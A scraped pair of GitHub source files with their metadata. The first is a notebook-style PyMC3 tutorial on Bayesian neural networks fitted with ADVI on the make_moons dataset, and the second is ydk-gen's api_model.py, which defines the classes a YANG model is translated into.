"name": "JavaScript",
"bytes": "103687"
},
{
"name": "Makefile",
"bytes": "5765"
},
{
"name": "Python",
"bytes": "10540191"
},
{
"name": "Shell",
"bytes": "10452"
}
],
"symlink_target": ""
} |
get_ipython().magic('matplotlib inline')
import theano
floatX = theano.config.floatX
import pymc3 as pm
import theano.tensor as T
import sklearn
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('white')
from sklearn import datasets
from sklearn.preprocessing import scale
from sklearn.cross_validation import train_test_split
from sklearn.datasets import make_moons
# In[3]:
X, Y = make_moons(noise=0.2, random_state=0, n_samples=1000)
X = scale(X)
X = X.astype(floatX)
Y = Y.astype(floatX)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)
# In[4]:
fig, ax = plt.subplots()
ax.scatter(X[Y==0, 0], X[Y==0, 1], label='Class 0')
ax.scatter(X[Y==1, 0], X[Y==1, 1], color='r', label='Class 1')
sns.despine(); ax.legend()
ax.set(xlabel='X', ylabel='Y', title='Toy binary classification data set');
# ## Model specification
#
# A neural network is quite simple. The basic unit is a perceptron which is nothing more than logistic regression. We use many of these in parallel and then stack them up to get hidden layers. Here we will use 2 hidden layers with 5 neurons each which is sufficient for such a simple problem.
# In[5]:
# Trick: Turn inputs and outputs into shared variables.
# It's still the same thing, but we can later change the values of the shared variable
# (to switch in the test-data later) and pymc3 will just use the new data.
# Kind-of like a pointer we can redirect.
# For more info, see: http://deeplearning.net/software/theano/library/compile/shared.html
ann_input = theano.shared(X_train)
ann_output = theano.shared(Y_train)
n_hidden = 5
# Initialize random weights between each layer
init_1 = np.random.randn(X.shape[1], n_hidden).astype(floatX)
init_2 = np.random.randn(n_hidden, n_hidden).astype(floatX)
init_out = np.random.randn(n_hidden).astype(floatX)
with pm.Model() as neural_network:
# Weights from input to hidden layer
weights_in_1 = pm.Normal('w_in_1', 0, sd=1,
shape=(X.shape[1], n_hidden),
testval=init_1)
# Weights from 1st to 2nd layer
weights_1_2 = pm.Normal('w_1_2', 0, sd=1,
shape=(n_hidden, n_hidden),
testval=init_2)
# Weights from hidden layer to output
weights_2_out = pm.Normal('w_2_out', 0, sd=1,
shape=(n_hidden,),
testval=init_out)
# Build neural-network using tanh activation function
act_1 = pm.math.tanh(pm.math.dot(ann_input,
weights_in_1))
act_2 = pm.math.tanh(pm.math.dot(act_1,
weights_1_2))
act_out = pm.math.sigmoid(pm.math.dot(act_2,
weights_2_out))
# Binary classification -> Bernoulli likelihood
out = pm.Bernoulli('out',
act_out,
observed=ann_output)
# That’s not so bad. The Normal priors help regularize the weights. Usually we would add a constant b to the inputs but I omitted it here to keep the code cleaner.
# ## Variational Inference: Scaling model complexity
#
# We could now just run a MCMC sampler like `NUTS <http://pymc-devs.github.io/pymc3/api.html#nuts>`__ which works pretty well in this case but as I already mentioned, this will become very slow as we scale our model up to deeper architectures with more layers.
#
# Instead, we will use the brand-new ADVI variational inference algorithm which was recently added to PyMC3. This is much faster and will scale better. Note, that this is a mean-field approximation so we ignore correlations in the posterior.
# In[6]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n # Run ADVI which returns posterior means, standard deviations, and the evidence lower bound (ELBO)\n v_params = pm.variational.advi(n=50000)')
# < 20 seconds on my older laptop. That’s pretty good considering that NUTS is having a really hard time. Further below we make this even faster. To make it really fly, we probably want to run the Neural Network on the GPU.
#
# As samples are more convenient to work with, we can very quickly draw samples from the variational posterior using sample_vp() (this is just sampling from Normal distributions, so not at all the same like MCMC):
# In[9]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n trace = pm.variational.sample_vp(v_params, draws=5000)')
# Plotting the objective function (ELBO) we can see that the optimization slowly improves the fit over time.
#
#
# In[10]:
plt.plot(v_params.elbo_vals)
plt.ylabel('ELBO')
plt.xlabel('iteration')
# Now that we trained our model, lets predict on the hold-out set using a posterior predictive check (PPC). We use `sample_ppc() <http://pymc-devs.github.io/pymc3/api.html#pymc3.sampling.sample_ppc>`__ to generate new data (in this case class predictions) from the posterior (sampled from the variational estimation).
# In[11]:
# Replace shared variables with testing set
ann_input.set_value(X_test)
ann_output.set_value(Y_test)
# Creater posterior predictive samples
ppc = pm.sample_ppc(trace, model=neural_network, samples=500)
# Use probability of > 0.5 to assume prediction of class 1
pred = ppc['out'].mean(axis=0) > 0.5
# In[12]:
fig, ax = plt.subplots()
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
sns.despine()
ax.set(title='Predicted labels in testing set', xlabel='X', ylabel='Y');
# In[13]:
print('Accuracy = {}%'.format((Y_test == pred).mean() * 100))
# Hey, our neural network did all right!
#
# ## Lets look at what the classifier has learned
# For this, we evaluate the class probability predictions on a grid over the whole input space.
# In[14]:
grid = np.mgrid[-3:3:100j,-3:3:100j].astype(floatX)
grid_2d = grid.reshape(2, -1).T
dummy_out = np.ones(grid.shape[1], dtype=np.int8)
# In[15]:
ann_input.set_value(grid_2d)
ann_output.set_value(dummy_out)
# Creater posterior predictive samples
ppc = pm.sample_ppc(trace, model=neural_network, samples=500)
# ## Probability surface
#
#
# In[16]:
cmap = sns.diverging_palette(250, 12, s=85, l=25, as_cmap=True)
fig, ax = plt.subplots(figsize=(10, 6))
contour = ax.contourf(*grid, ppc['out'].mean(axis=0).reshape(100, 100), cmap=cmap)
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
cbar = plt.colorbar(contour, ax=ax)
_ = ax.set(xlim=(-3, 3), ylim=(-3, 3), xlabel='X', ylabel='Y');
cbar.ax.set_ylabel('Posterior predictive mean probability of class label = 0');
# ## Uncertainty in predicted value
# So far, everything I showed we could have done with a non-Bayesian Neural Network. The mean of the posterior predictive for each class-label should be identical to maximum likelihood predicted values. However, we can also look at the standard deviation of the posterior predictive to get a sense for the uncertainty in our predictions. Here is what that looks like:
# In[17]:
cmap = sns.cubehelix_palette(light=1, as_cmap=True)
fig, ax = plt.subplots(figsize=(10, 6))
contour = ax.contourf(*grid, ppc['out'].std(axis=0).reshape(100, 100), cmap=cmap)
ax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])
ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
cbar = plt.colorbar(contour, ax=ax)
_ = ax.set(xlim=(-3, 3), ylim=(-3, 3), xlabel='X', ylabel='Y');
cbar.ax.set_ylabel('Uncertainty (posterior predictive standard deviation)');
# We can see that very close to the decision boundary, our uncertainty as to which label to predict is highest. You can imagine that associating predictions with uncertainty is a critical property for many applications like health care. To further maximize accuracy, we might want to train the model primarily on samples from that high-uncertainty region.
# ## Mini-batch ADVI: Scaling data size
# So far, we have trained our model on all data at once. Obviously this won’t scale to something like ImageNet. Moreover, training on mini-batches of data (stochastic gradient descent) avoids local minima and can lead to faster convergence.
#
# Fortunately, ADVI can be run on mini-batches as well. It just requires some setting up:
# In[18]:
from six.moves import zip
# Set back to original data to retrain
ann_input.set_value(X_train)
ann_output.set_value(Y_train)
# Tensors and RV that will be using mini-batches
minibatch_tensors = [ann_input, ann_output]
minibatch_RVs = [out]
# Generator that returns mini-batches in each iteration
def create_minibatch(data):
rng = np.random.RandomState(0)
while True:
# Return random data samples of set size 100 each iteration
ixs = rng.randint(len(data), size=50)
yield data[ixs]
minibatches = zip(
create_minibatch(X_train),
create_minibatch(Y_train),
)
total_size = len(Y_train)
# While the above might look a bit daunting, I really like the design. Especially the fact that you define a generator allows for great flexibility. In principle, we could just pool from a database there and not have to keep all the data in RAM.
#
# Lets pass those to advi_minibatch():
# In[19]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n # Run advi_minibatch\n v_params = pm.variational.advi_minibatch(\n n=50000, minibatch_tensors=minibatch_tensors,\n minibatch_RVs=minibatch_RVs, minibatches=minibatches,\n total_size=total_size, learning_rate=1e-2, epsilon=1.0\n )')
# In[20]:
with neural_network:
trace = pm.variational.sample_vp(v_params, draws=5000)
# In[21]:
plt.plot(v_params.elbo_vals)
plt.ylabel('ELBO')
plt.xlabel('iteration')
sns.despine()
# As you can see, mini-batch ADVI’s running time is much lower. It also seems to converge faster.
#
# For fun, we can also look at the trace. The point is that we also get uncertainty of our Neural Network weights.
# In[22]:
pm.traceplot(trace);
# ## Summary
# Hopefully this blog post demonstrated a very powerful new inference algorithm available in PyMC3: ADVI. I also think bridging the gap between Probabilistic Programming and Deep Learning can open up many new avenues for innovation in this space, as discussed above. Specifically, a hierarchical neural network sounds pretty bad-ass. These are really exciting times.
# In[ ]:
| {
"content_hash": "05d9f72da8e78c938cdc078481811959",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 367,
"avg_line_length": 37.75,
"alnum_prop": 0.6990114214415971,
"repo_name": "balarsen/pymc_learning",
"id": "ae7bbae0260554fa6379ee5151fc387029011dea",
"size": "10717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "BayesianNetwork/Neural Networks in PyMC3.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3143936"
},
{
"name": "Jupyter Notebook",
"bytes": "132018941"
},
{
"name": "Python",
"bytes": "26029"
}
],
"symlink_target": ""
} |
"""
api_model.py
The meta-model of the generated API.
Translation process converts the YANG model to classes defined in this module.
"""
from __future__ import absolute_import
from pyang.statements import TypeStatement
from pyang.types import UnionTypeSpec, PathTypeSpec
class Element(object):
"""
The Element class.
This is the super class of all modelled elements in the API.
:attribute:: owned_elements
list of `Element` owned by this element
:attribute:: owner
The owner of this `Element`.
:attribute:: comment
The comments associated with this element.
"""
def __init__(self):
self.owned_elements = []
self._owner = None
self.comment = None
self.revision = None
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
self._owner = owner
class Deviation(Element):
def __init__(self, iskeyword):
Element.__init__(self)
self.name = None
self._stmt = None
self.d_type = None
self.d_target = None
self.iskeyword = iskeyword
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self.name = stmt.arg
def qn(self):
names = []
stmt = self.d_target
while stmt.parent:
if stmt.keyword not in ('container', 'list', 'rpc'):
names.append(self.convert_prop_name(stmt))
else:
names.append(self.convert_owner_name(stmt))
stmt = stmt.parent
return '.'.join(reversed(names))
def convert_prop_name(self, stmt):
name = snake_case(stmt.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name.startswith('_'):
name = '%s%s' % ('y', name)
return name
def convert_owner_name(self, stmt):
name = escape_name(stmt.arg)
if stmt.keyword == 'grouping':
name = '%sGrouping' % camel_case(name)
elif stmt.keyword == 'identity':
name = '%sIdentity' % camel_case(name)
elif stmt.keyword == 'rpc':
name = camel_case(name) + 'Rpc'
else:
name = camel_case(name)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name.startswith('_'):
name = '%s%s' % ('Y', name)
return name
def get_package(self):
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
if hasattr(self.owner, 'get_package'):
return self.owner.get_package()
class NamedElement(Element):
"""
An abstract element that may have a name
The name is used for identification of the named element
within the namespace that is defined or accessible
:attribute:: name
The name of the Element
"""
def __init__(self):
""" The name of the named element """
super().__init__()
self.name = None
def get_py_mod_name(self):
"""
Get the python module name that contains this
NamedElement.
"""
pkg = get_top_pkg(self)
if not pkg.bundle_name:
py_mod_name = 'ydk.models.%s' % pkg.name
else:
py_mod_name = 'ydk.models.%s.%s' % (pkg.bundle_name, pkg.name)
return py_mod_name
def get_cpp_header_name(self):
"""
Get the c++ header that contains this
NamedElement.
"""
pkg = get_top_pkg(self)
if pkg.curr_bundle_name == pkg.bundle_name:
cpp_header_name = '%s.hpp' % pkg.name
else:
cpp_header_name = 'ydk_%s/%s.hpp' % (pkg.bundle_name, pkg.name)
return cpp_header_name
def get_meta_py_mod_name(self):
"""
Get the python meta module that contains the meta model
information about this NamedElement.
"""
pkg = get_top_pkg(self)
if not pkg.bundle_name:
meta_py_mod_name = 'ydk.models._meta'
else:
meta_py_mod_name = 'ydk.models.%s._meta' % pkg.bundle_name
return meta_py_mod_name
def fqn(self):
''' get the Fully Qualified Name '''
names = []
element = self
while element is not None:
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '.'.join(reversed(names))
def qn(self):
''' get the qualified name , name sans
package name '''
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '.'.join(reversed(names))
def qualified_cpp_name(self):
''' get the C++ qualified name , name sans
package name '''
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '::'.join(reversed(names))
def fully_qualified_cpp_name(self):
''' get the C++ qualified name '''
pkg = get_top_pkg(self)
names = []
element = self
while element is not None:
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return pkg.bundle_name + '::' + '::'.join(reversed(names))
def go_name(self):
stmt = self.stmt
if stmt is None:
raise Exception('element is not yet defined')
if hasattr(self, 'goName'):
return self.goName
stmt_name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
name = camel_case(stmt_name)
if stmt_name[-1] == '_':
name = '%s_' % name
if self.iskeyword(name):
name = 'Y%s' % name
self.goName = name
return self.goName
def qualified_go_name(self):
''' get the Go qualified name (sans package name) '''
if self.stmt.keyword == 'identity':
return self.go_name()
if hasattr(self, 'qualifiedGoName'):
return self.qualifiedGoName
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.go_name())
element = element.owner
self.qualifiedGoName = '_'.join(reversed(names))
return self.qualifiedGoName
class Package(NamedElement):
"""
Represents a Package in the API
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._sub_name = ''
self._bundle_name = ''
self._curr_bundle_name = ''
self._augments_other = False
self.identity_subclasses = {}
self.iskeyword = iskeyword
self.version = '1'
def qn(self):
""" Return the qualified name """
return self.name
@property
def is_deviation(self):
return hasattr(self.stmt, 'is_deviation_module')
@property
def is_augment(self):
return hasattr(self.stmt, 'is_augmented_module')
@property
def augments_other(self):
return self._augments_other
@augments_other.setter
def augments_other(self, augments_other):
self._augments_other = augments_other
@property
def bundle_name(self):
return self._bundle_name
@bundle_name.setter
def bundle_name(self, bundle_name):
self._bundle_name = bundle_name
@property
def curr_bundle_name(self):
return self._curr_bundle_name
@curr_bundle_name.setter
def curr_bundle_name(self, curr_bundle_name):
self._curr_bundle_name = curr_bundle_name
@property
def sub_name(self):
if self.bundle_name != '':
sub = self.bundle_name
else:
py_mod_name = self.get_py_mod_name()
sub = py_mod_name[len('ydk.models.'): py_mod_name.rfind('.')]
return sub
@property
def stmt(self):
""" Return the `pyang.statements.Statement` associated
with this package. This is usually a module statement.
"""
return self._stmt
@stmt.setter
def stmt(self, stmt):
name = stmt.arg.replace('-', '_')
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name[0] == '_':
name = 'y%s' % name
self.name = name
revision = stmt.search_one('revision')
if revision is not None:
self.revision = revision.arg
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
if hasattr(stmt, 'i_version'):
self.version = stmt.i_version
def imported_types(self):
"""
Returns a list of all types imported by elements in
this package.
"""
imported_types = []
for clazz in [c for c in self.owned_elements if isinstance(c, Class)]:
imported_types.extend(clazz.imported_types())
return imported_types
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.name == other.name
else:
return False
__hash__ = NamedElement.__hash__
class DataType(NamedElement):
"""
Represents a DataType
"""
def __init__(self):
super().__init__()
class Class(NamedElement):
"""
Represents a Class in the api.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._extends = []
self._module = None
self.iskeyword = iskeyword
@property
def extends(self):
""" Returns the immediate super classes of this class. """
if self.is_identity():
base = []
base_stmts = self.stmt.search('base')
for base_stmt in base_stmts:
if hasattr(base_stmt, 'i_identity'):
base_identity = base_stmt.i_identity
if hasattr(base_identity, 'i_class'):
base.append(base_identity.i_class)
return base
else:
return self._extends
def is_identity(self):
""" Returns True if this is a class for a YANG identity. """
return self._stmt.keyword == 'identity'
def is_grouping(self):
""" Returns True if this is a class for a YANG grouping. """
return self._stmt.keyword == 'grouping'
def is_rpc(self):
return self._stmt.keyword == 'rpc'
def all_owned_elements(self):
""" Returns all the owned_element of this class and its super classes."""
all_owned_elements = []
for super_class in self.extends:
all_owned_elements.extend(super_class.all_owned_elements())
all_owned_elements.extend(self.owned_elements)
return all_owned_elements
def properties(self):
""" Returns the properties defined by this class. """
return get_properties(self.owned_elements)
def get_package(self):
""" Returns the Package that contains this Class. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
if hasattr(self.owner, 'get_package'):
return self.owner.get_package()
def imported_types(self):
""" Returns all types that are referenced in this Class that are not
from the same package as this Class."""
imported_types = []
package = self.get_package()
# look at the super classes
for super_class in self.extends:
if super_class.get_package() != package:
if super_class not in imported_types:
imported_types.append(super_class)
for p in self.properties():
prop_types = [p.property_type]
if isinstance(p.property_type, UnionTypeSpec):
for child_type_stmt in p.property_type.types:
prop_types.extend(_get_union_types(child_type_stmt))
for prop_type in prop_types:
if isinstance(prop_type, Class) or isinstance(prop_type, Enum) or isinstance(prop_type, Bits):
if prop_type.get_package() != package:
if prop_type not in imported_types:
imported_types.append(prop_type)
# do this for nested classes too
for nested_class in [clazz for clazz in self.owned_elements if isinstance(clazz, Class)]:
imported_types.extend(
[c for c in nested_class.imported_types() if c not in imported_types])
return imported_types
def get_dependent_siblings(self):
''' This will return all types that are referenced by this Class
or nested Classes that are at the same level as this type within the package and are
used as super types .
This is useful to determine which type needs to be printed
before declaring this type in languages that do not support
forward referencing like Python '''
classes_at_same_level = []
classes_at_same_level.extend(
[c for c in self.owner.owned_elements if isinstance(c, Class) and c is not self])
dependent_siblings = []
package = self.get_package()
def _walk_supers(clazz):
for super_class in clazz.extends:
if super_class.get_package() == package and super_class in classes_at_same_level:
if super_class not in dependent_siblings:
dependent_siblings.append(super_class)
_walk_supers(super_class)
def _walk_nested_classes(clazz):
for nested_class in [c for c in clazz.owned_elements if isinstance(c, Class)]:
_walk_supers(nested_class)
_walk_nested_classes(nested_class)
_walk_supers(self)
_walk_nested_classes(self)
return dependent_siblings
def is_config(self):
"""
Returns True if an instance of this Class represents config data.
"""
if hasattr(self.stmt, 'i_config'):
return self.stmt.i_config
elif isinstance(self.owner, Class):
return self.owner.is_config
else:
return True
@property
def stmt(self):
"""
Returns the `pyang.statements.Statement` instance associated with this Class.
"""
return self._stmt
@property
def module(self):
"""
Returns the module `pyang.statements.Statement` that this Class was derived from.
"""
return self._module
@stmt.setter
def stmt(self, stmt):
name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
name = camel_case(name)
if self.iskeyword(name):
name = '_%s' % name
self.name = name
if self.name.startswith('_'):
self.name = '%s%s' % ('Y', name)
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
if stmt.keyword == 'module':
self._module = stmt
else:
self._module = stmt.i_module
def get_key_props(self):
""" Returns a list of the properties of this class that are keys
of a YANG list. """
key_props = []
if self.stmt.keyword == 'list':
if hasattr(self.stmt, 'i_key'):
key_stmts = self.stmt.i_key
# do not use #properties here
for prop in [p for p in self.owned_elements if isinstance(p, Property)]:
if prop.stmt in key_stmts:
key_props.append(prop)
return key_props
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.fqn() == other.fqn()
else:
return False
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
self._owner = owner
self.name = _modify_nested_container_with_same_name(self)
def set_owner(self, owner, language):
self._owner = owner
if language == 'cpp':
self.name = _modify_nested_container_with_same_name(self)
__hash__ = NamedElement.__hash__
class AnyXml(NamedElement):
"""
Represents an AnyXml element.
"""
def __init__(self):
super().__init__()
self._stmt = None
@property
def stmt(self):
""" Returns the `pyang.statements.Statement` instance associated with this AnyXml instance."""
return self._stmt
@stmt.setter
def stmt(self, stmt):
self.name = 'string'
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
def properties(self):
return get_properties(self.owned_elements)
class Bits(DataType):
"""
A DataType representing the bits type in YANG.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._dictionary = None
self._pos_map = None
self.iskeyword = iskeyword
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.fqn() == other.fqn()
else:
return False
def get_package(self):
""" Returns the Package for this DataType. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
return self.owner.get_package()
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self._dictionary = {}
self._pos_map = {}
# the name of the enumeration is derived either from the typedef
# or the leaf under which it is defined
leaf_or_typedef = stmt
while leaf_or_typedef.parent and leaf_or_typedef.keyword not in ['leaf', 'leaf-list', 'typedef']:
leaf_or_typedef = leaf_or_typedef.parent
name = '%s' % camel_case(leaf_or_typedef.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s' % name
self.name = name
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
else:
desc = leaf_or_typedef.search_one('description')
if desc is not None:
self.comment = desc.arg
for bit_stmt in stmt.search('bit'):
self._dictionary[bit_stmt.arg] = False
pos_stmt = bit_stmt.search_one('position')
if pos_stmt is not None:
self._pos_map[bit_stmt.arg] = pos_stmt.arg
__hash__ = DataType.__hash__
class Property(NamedElement):
""" Represents an attribute or reference of a Class.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self.is_static = False
self.featuring_classifiers = []
self.read_only = False
self.is_many = False
self.id = False
self._property_type = None
self.max_elements = None
self.min_elements = None
self.iskeyword = iskeyword
def is_key(self):
""" Returns True if this property represents a key of a YANG list."""
if isinstance(self.owner, Class):
return self in self.owner.get_key_props()
return False
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
# name = snake_case(stmt.arg)
name = snake_case(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
self.name = name
if self.name.startswith('_'):
self.name = '%s%s' % ('y', name)
if stmt.keyword in ['leaf-list', 'list']:
self.is_many = True
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
max_elem_stmt = stmt.search_one('max-elements')
min_elem_stmt = stmt.search_one('min-elements')
if max_elem_stmt:
self.max_elements = max_elem_stmt.arg
if min_elem_stmt:
self.min_elements = min_elem_stmt.arg
@property
def property_type(self):
""" Returns the type of this property. """
if self._property_type is not None:
return self._property_type
if self._stmt is None:
return None
if self._stmt.keyword in ['leaf', 'leaf-list']:
type_stmt = self._stmt.search_one('type')
return type_stmt.i_type_spec
else:
return None
@property_type.setter
def property_type(self, property_type):
self._property_type = property_type
class Enum(DataType):
""" Represents an enumeration. """
def __init__(self, iskeyword, typedef_stmt=None):
super().__init__()
self._stmt = None
self.literals = []
self.iskeyword = iskeyword
while typedef_stmt and typedef_stmt.keyword != 'typedef' and typedef_stmt.parent:
typedef_stmt = typedef_stmt.parent
self.typedef_stmt = typedef_stmt
def get_package(self):
""" Returns the Package that this enum is found in. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
return self.owner.get_package()
def go_name(self):
stmt = self.stmt
if stmt is None:
raise Exception('element is not yet defined')
if hasattr(self, 'goName'):
return self.goName
while stmt.parent and stmt.keyword not in ['leaf', 'leaf-list', 'typedef']:
stmt = stmt.parent
name = stmt.arg
if self.typedef_stmt:
name = self.typedef_stmt.arg
name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else name)
name = camel_case(name)
if self.iskeyword(name):
name = '%s%s' % ('Y', name)
suffix = '_' if self.name[-1] == '_' else ''
name = '%s%s' % (name, suffix)
self.goName = name
return self.goName
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
# the name of the numeration is derived either from the typedef
# or the leaf under which it is defined
leaf_or_typedef = stmt
while leaf_or_typedef.parent and leaf_or_typedef.keyword not in ['leaf', 'leaf-list', 'typedef']:
leaf_or_typedef = leaf_or_typedef.parent
name = leaf_or_typedef.arg
if self.typedef_stmt:
name = self.typedef_stmt.arg
name = camel_case(escape_name(name))
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name[0] == '_':
name = 'Y%s' % name
self.name = name
desc = None
if self.typedef_stmt:
desc = self.typedef_stmt.search_one('description')
if desc is None:
desc = stmt.search_one('description')
if desc is None:
leaf_or_typedef.search_one('description')
if desc:
self.comment = desc.arg
else:
self.comment = ""
for enum_stmt in stmt.search('enum'):
literal = EnumLiteral(self.iskeyword)
literal.stmt = enum_stmt
self.literals.append(literal)
class EnumLiteral(NamedElement):
""" Represents an enumeration literal. """
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self.value = None
self.iskeyword = iskeyword
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self.name = stmt.arg.replace('-', '_')
self.name = self.name.replace('+', '__PLUS__')
self.name = self.name.replace('/', '__FWD_SLASH__')
self.name = self.name.replace('\\', '__BACK_SLASH__')
self.name = self.name.replace('.', '__DOT__')
self.name = self.name.replace('*', '__STAR__')
self.name = self.name.replace('$', '__DOLLAR__')
self.name = self.name.replace('@', '__AT__')
self.name = self.name.replace('#', '__POUND__')
self.name = self.name.replace('^', '__CARET__')
self.name = self.name.replace('&', '__AMPERSAND__')
self.name = self.name.replace('(', '__LPAREN__')
self.name = self.name.replace(')', '__RPAREN__')
self.name = self.name.replace('=', '__EQUALS__')
self.name = self.name.replace('{', '__LCURLY__')
self.name = self.name.replace('}', '__RCURLY__')
self.name = self.name.replace("'", '__SQUOTE__')
self.name = self.name.replace('"', '__DQUOTE__')
self.name = self.name.replace('<', '__GREATER_THAN__')
self.name = self.name.replace('>', '__LESS_THAN__')
self.name = self.name.replace(',', '__COMMA__')
self.name = self.name.replace(':', '__COLON__')
self.name = self.name.replace('?', '__QUESTION__')
self.name = self.name.replace('!', '__BANG__')
self.name = self.name.replace(';', '__SEMICOLON__')
self.name = self.name.replace(' ', '_')
if self.iskeyword(self.name):
self.name += '_'
if self.name[0:1].isdigit():
self.name = 'Y_%s' % self.name
if self.name[0] == '_':
self.name = 'Y%s' % self.name
self.value = stmt.i_value
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
def get_top_pkg(pkg):
"""
Get top level Package instance of current NamedElement instance.
"""
while pkg is not None and not isinstance(pkg, Package):
pkg = pkg.owner
return pkg
def get_properties(owned_elements):
""" get all properties from the owned_elements. """
props = []
all_props = []
all_props.extend([p for p in owned_elements if isinstance(p, Property)])
# first get the key properties
key_props = [p for p in all_props if p.is_key()]
props.extend(key_props)
non_key_props = [p for p in all_props if not p.is_key()]
props.extend(non_key_props)
return props
def _modify_nested_container_with_same_name(named_element):
if named_element.owner.name.rstrip('_') == named_element.name:
return '%s_' % named_element.owner.name
else:
return named_element.name
def snake_case(input_text):
s = input_text.replace('-', '_')
s = s.replace('.', '_')
return s.lower()
def get_property_name(element, iskeyword):
name = snake_case(element.stmt.unclashed_arg if hasattr(element.stmt, 'unclashed_arg') else element.stmt.arg)
if iskeyword(name) or iskeyword(name.lower()) or (
element.owner is not None and element.stmt.arg.lower() == element.owner.stmt.arg.lower()):
name = '%s_' % name
return name
# capitalized input will not affected
def camel_case(input_text):
def _capitalize(s):
if len(s) == 0 or s.startswith(s[0].upper()):
return s
ret = s[0].upper()
if len(s) > 1:
ret = '%s%s' % (ret, s[1:])
return ret
result = ''.join([_capitalize(word) for word in input_text.split('-')])
result = ''.join([_capitalize(word) for word in result.split('_')])
if input_text.startswith('_'):
result = '_' + result
return result
def camel_snake(input_text):
return '_'.join([word.title() for word in input_text.split('-')])
def escape_name(name):
name = name.replace('+', '__PLUS__')
name = name.replace('/', '__FWD_SLASH__')
name = name.replace('\\', '__BACK_SLASH__')
name = name.replace('.', '__DOT__')
name = name.replace('*', '__STAR__')
name = name.replace('$', '__DOLLAR__')
name = name.replace('@', '__AT__')
name = name.replace('#', '__POUND__')
name = name.replace('^', '__CARET__')
name = name.replace('&', '__AMPERSAND__')
name = name.replace('(', '__LPAREN__')
name = name.replace(')', '__RPAREN__')
name = name.replace('=', '__EQUALS__')
name = name.replace('{', '__LCURLY__')
name = name.replace('}', '__RCURLY__')
name = name.replace("'", '__SQUOTE__')
name = name.replace('"', '__DQUOTE__')
name = name.replace('<', '__GREATER_THAN__')
name = name.replace('>', '__LESS_THAN__')
name = name.replace(',', '__COMMA__')
name = name.replace(':', '__COLON__')
name = name.replace('?', '__QUESTION__')
name = name.replace('!', '__BANG__')
name = name.replace(';', '__SEMICOLON__')
return name
def _get_union_types(type_stmt):
from .builder import TypesExtractor
prop_type = TypesExtractor().get_property_type(type_stmt)
if isinstance(prop_type, TypeStatement):
prop_type = prop_type.i_type_spec
prop_type_specs = []
if isinstance(prop_type, UnionTypeSpec):
for child_type_stmt in prop_type.types:
prop_type_specs.extend(_get_union_types(child_type_stmt))
else:
prop_type_specs.append(prop_type)
return prop_type_specs
| {
"content_hash": "3e89b4b8c25fd841d2bbec271b2a03ac",
"timestamp": "",
"source": "github",
"line_count": 990,
"max_line_length": 113,
"avg_line_length": 30.830303030303032,
"alnum_prop": 0.5555664766398009,
"repo_name": "CiscoDevNet/ydk-gen",
"id": "6677891749f668d2eb0ec5edd8850630cccc5a6a",
"size": "31563",
"binary": false,
